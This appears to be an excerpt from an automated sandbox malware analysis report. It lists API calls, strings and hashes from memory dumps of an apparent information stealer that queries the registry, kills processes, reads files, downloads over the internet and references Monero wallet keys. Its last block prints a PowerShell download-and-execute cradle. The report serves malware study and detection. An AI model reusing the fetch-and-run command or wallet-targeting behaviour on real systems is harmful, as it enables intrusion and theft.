                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$CloseHandleProcessProcess32$CreateFirstNextOpenSleepSnapshotSystemTerminateTimeToolhelp32lstrcpywsprintf
                                  • String ID: D
                                  • API String ID: 531068710-2746444292
                                  • Opcode ID: ab550a190cf489297d48f3b96e2a37f65417ece2a2092a42f439474c71fbb89c
                                  • Instruction ID: 4785035b0953acb99d06b3c2975321a92eca4726f7b54daf8a612b6d777d07b5
                                  • Opcode Fuzzy Hash: ab550a190cf489297d48f3b96e2a37f65417ece2a2092a42f439474c71fbb89c
                                  • Instruction Fuzzy Hash: B15188B5D44308ABDB24DB60DC4AFEA77B8AB44700F0045D8B60DAB2D1EB755B88CF51
                                  APIs
                                  • _ValidateLocalCookies.LIBCMT ref: 00C1FA1F
                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 00C1FA27
                                  • _ValidateLocalCookies.LIBCMT ref: 00C1FAB0
                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 00C1FADB
                                  • _ValidateLocalCookies.LIBCMT ref: 00C1FB30
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                  • String ID: csm
                                  • API String ID: 1170836740-1018135373
                                  • Opcode ID: 73bc2f32c22e0088af07211562fb197d2e7e36a363a5a26788fe809058fe556b
                                  • Instruction ID: 109d7ff537de0255e1b7240c1b3e804fe10c303fb5e1eee085b494598ac04355
                                  • Opcode Fuzzy Hash: 73bc2f32c22e0088af07211562fb197d2e7e36a363a5a26788fe809058fe556b
                                  • Instruction Fuzzy Hash: 6B41A930900119DFCF10DF68C884ADD7BB5FF46314F14816AE829AB352D735DA86EB91
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00BA501A
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00BA5021
                                  • InternetOpenA.WININET(00BC0DE3,00000000,00000000,00000000,00000000), ref: 00BA503A
                                  • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00BA5061
                                  • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00BA5091
                                  • InternetCloseHandle.WININET(?), ref: 00BA5109
                                  • InternetCloseHandle.WININET(?), ref: 00BA5116
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                                  • String ID:
                                  • API String ID: 3066467675-0
                                  • Opcode ID: bb4d61efcadd214afc22ca79de519819ca1ef6cd579ffcaca8cb5b4a47db5bd3
                                  • Instruction ID: a65a082fb3fc7695deaa145e4e07a7bb86382005fbbfc352d47a1f00c665084b
                                  • Opcode Fuzzy Hash: bb4d61efcadd214afc22ca79de519819ca1ef6cd579ffcaca8cb5b4a47db5bd3
                                  • Instruction Fuzzy Hash: BC31F6B4A44218ABDB20CF54DC85BDDB7B4AB48304F5081E8FA09B7281D7706EC58F98
                                  APIs
                                  • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00BB85B6
                                  • wsprintfA.USER32 ref: 00BB85E9
                                  • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00BB860B
                                  • RegCloseKey.ADVAPI32(00000000), ref: 00BB861C
                                  • RegCloseKey.ADVAPI32(00000000), ref: 00BB8629
                                    • Part of subcall function 00BBAAB0: lstrcpy.KERNEL32(?,00000000), ref: 00BBAAF6
                                  • RegQueryValueExA.ADVAPI32(00000000,0130E630,00000000,000F003F,?,00000400), ref: 00BB867C
                                  • lstrlen.KERNEL32(?), ref: 00BB8691
                                  • RegQueryValueExA.ADVAPI32(00000000,0130E5B8,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00BC0B3C), ref: 00BB8729
                                  • RegCloseKey.ADVAPI32(00000000), ref: 00BB8798
                                  • RegCloseKey.ADVAPI32(00000000), ref: 00BB87AA
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                                  • String ID: %s\%s
                                  • API String ID: 3896182533-4073750446
                                  • Opcode ID: e2fc5b5638b53dc757c9dd0231f916b8343f3fbc3e42f0377a0876e40dfacfcd
                                  • Instruction ID: 8607db4aee36fe92f497a1646111cfa39b79380f45004cda8f00de5e01003fcd
                                  • Opcode Fuzzy Hash: e2fc5b5638b53dc757c9dd0231f916b8343f3fbc3e42f0377a0876e40dfacfcd
                                  • Instruction Fuzzy Hash: 46210771A10218AFDB24DB54DC85FE9B7B8FB48704F0081D8A649A6180DF706A85CFA4
                                  APIs
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00BB99C5
                                  • Process32First.KERNEL32(00BAA056,00000128), ref: 00BB99D9
                                  • Process32Next.KERNEL32(00BAA056,00000128), ref: 00BB99F2
                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00BB9A4E
                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 00BB9A6C
                                  • CloseHandle.KERNEL32(00000000), ref: 00BB9A79
                                  • CloseHandle.KERNEL32(00BAA056), ref: 00BB9A88
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                  • String ID:
                                  • API String ID: 2696918072-0
                                  • Opcode ID: f331e9113f62d4acda803170f9901e61453fe72d86323506e25b0f40e25b9e3a
                                  • Instruction ID: 65070f82528503cdf62188c3fa8d4e3aa93fe864a6934e83d28e7b7f75624188
                                  • Opcode Fuzzy Hash: f331e9113f62d4acda803170f9901e61453fe72d86323506e25b0f40e25b9e3a
                                  • Instruction Fuzzy Hash: 7021CD759042189FDB25DF52DC89BEDB7B9BB48704F5041C8E609A6290D7749EC4CF50
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00BB7834
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00BB783B
                                  • RegOpenKeyExA.ADVAPI32(80000002,012FC808,00000000,00020119,00000000), ref: 00BB786D
                                  • RegQueryValueExA.ADVAPI32(00000000,0130E480,00000000,00000000,?,000000FF), ref: 00BB788E
                                  • RegCloseKey.ADVAPI32(00000000), ref: 00BB7898
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                   • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                  • String ID: Windows 11
                                  • API String ID: 3225020163-2517555085
                                  • Opcode ID: 082cd4ac12500dff55cac737d84bf3b972f386cacfeba102f1179edfe8de3af1
                                  • Instruction ID: 376204cc1f2717201b720b11aa8b7966b13c4b015029c7701f46959b14afc4a4
                                  • Opcode Fuzzy Hash: 082cd4ac12500dff55cac737d84bf3b972f386cacfeba102f1179edfe8de3af1
                                  • Instruction Fuzzy Hash: 0901F4B5A48305BFE700DBE6DD49FAD77B8EB44700F104198FA59A7291DAB09944CB50
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00BB78C4
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00BB78CB
                                  • RegOpenKeyExA.ADVAPI32(80000002,012FC808,00000000,00020119,00BB7849), ref: 00BB78EB
                                  • RegQueryValueExA.ADVAPI32(00BB7849,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 00BB790A
                                  • RegCloseKey.ADVAPI32(00BB7849), ref: 00BB7914
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                   • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                  • String ID: CurrentBuildNumber
                                  • API String ID: 3225020163-1022791448
                                  • Opcode ID: 27a24157e9b1a49777ea7141d87b10c86e67b36933abb849215a53abf2af7589
                                  • Instruction ID: 889f707eb94ed42b9315f7617b2233cc419a1eb8b7f66f834454bda12a644422
                                  • Opcode Fuzzy Hash: 27a24157e9b1a49777ea7141d87b10c86e67b36933abb849215a53abf2af7589
                                  • Instruction Fuzzy Hash: FE0167B5A44309BFEB00DBE5DC4AFAE77B8EB44700F004598F659B7291D7705A44CB90
                                  APIs
                                  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00BAA13C
                                  • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00BAA161
                                  • LocalAlloc.KERNEL32(00000040,?), ref: 00BAA181
                                  • ReadFile.KERNEL32(000000FF,?,00000000,00BA148F,00000000), ref: 00BAA1AA
                                  • LocalFree.KERNEL32(00BA148F), ref: 00BAA1E0
                                  • CloseHandle.KERNEL32(000000FF), ref: 00BAA1EA
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                   • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                  • String ID:
                                  • API String ID: 2311089104-0
                                  • Opcode ID: 885db3e8385fbe3312d46d9b4186d931538fa08cfa63c6d91e4df8ac03828628
                                  • Instruction ID: 9d86449c0e0969220ed1d9c40fd96c3f586e6e594914a30fda028b4a46f6cce2
                                  • Opcode Fuzzy Hash: 885db3e8385fbe3312d46d9b4186d931538fa08cfa63c6d91e4df8ac03828628
                                  • Instruction Fuzzy Hash: 1731FC74A04209EFDB14CF95D885BEEB7B5EB49300F108198E915B7290D774AA85CFA1
                                  APIs
                                  • lstrcat.KERNEL32(?,0130E840), ref: 00BB4A2B
                                    • Part of subcall function 00BB8F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00BB8F9B
                                  • lstrcat.KERNEL32(?,00000000), ref: 00BB4A51
                                  • lstrcat.KERNEL32(?,?), ref: 00BB4A70
                                  • lstrcat.KERNEL32(?,?), ref: 00BB4A84
                                  • lstrcat.KERNEL32(?,012FBA20), ref: 00BB4A97
                                  • lstrcat.KERNEL32(?,?), ref: 00BB4AAB
                                  • lstrcat.KERNEL32(?,0130E278), ref: 00BB4ABF
                                    • Part of subcall function 00BBAA50: lstrcpy.KERNEL32(00BC0E1A,00000000), ref: 00BBAA98
                                    • Part of subcall function 00BB8F20: GetFileAttributesA.KERNEL32(00000000,?,00BA1B94,?,?,00BC577C,?,?,00BC0E22), ref: 00BB8F2F
                                    • Part of subcall function 00BB47C0: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00BB47D0
                                    • Part of subcall function 00BB47C0: RtlAllocateHeap.NTDLL(00000000), ref: 00BB47D7
                                    • Part of subcall function 00BB47C0: wsprintfA.USER32 ref: 00BB47F6
                                    • Part of subcall function 00BB47C0: FindFirstFileA.KERNEL32(?,?), ref: 00BB480D
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                   • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                  • String ID:
                                  • API String ID: 2540262943-0
                                  • Opcode ID: bb15b2b1947d53185702474698d414e38fc387ee44796a4d2d3b669adbf7d2f0
                                  • Instruction ID: 831debb983a3532a184b7ebe7a2331927b0ea80b47d3b479e0e9c5d8892fb7a9
                                  • Opcode Fuzzy Hash: bb15b2b1947d53185702474698d414e38fc387ee44796a4d2d3b669adbf7d2f0
                                  • Instruction Fuzzy Hash: 2C3152F69002086BCF24EBB0DC85EED777CAB58700F4049D9B359A6052DEB096CDCB94
                                  APIs
                                    • Part of subcall function 00BBAA50: lstrcpy.KERNEL32(00BC0E1A,00000000), ref: 00BBAA98
                                    • Part of subcall function 00BBACC0: lstrlen.KERNEL32(?,013095E8,?,\Monero\wallet.keys,00BC0E1A), ref: 00BBACD5
                                    • Part of subcall function 00BBACC0: lstrcpy.KERNEL32(00000000), ref: 00BBAD14
                                    • Part of subcall function 00BBACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00BBAD22
                                    • Part of subcall function 00BBAC30: lstrcpy.KERNEL32(00000000,?), ref: 00BBAC82
                                    • Part of subcall function 00BBAC30: lstrcat.KERNEL32(00000000), ref: 00BBAC92
                                    • Part of subcall function 00BBABB0: lstrcpy.KERNEL32(?,00BC0E1A), ref: 00BBAC15
                                  • ShellExecuteEx.SHELL32(0000003C), ref: 00BB2FD5
                                  Strings
                                  • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00BB2F14
                                  • <, xrefs: 00BB2F89
                                  • ')", xrefs: 00BB2F03
                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00BB2F54
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                   • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmp
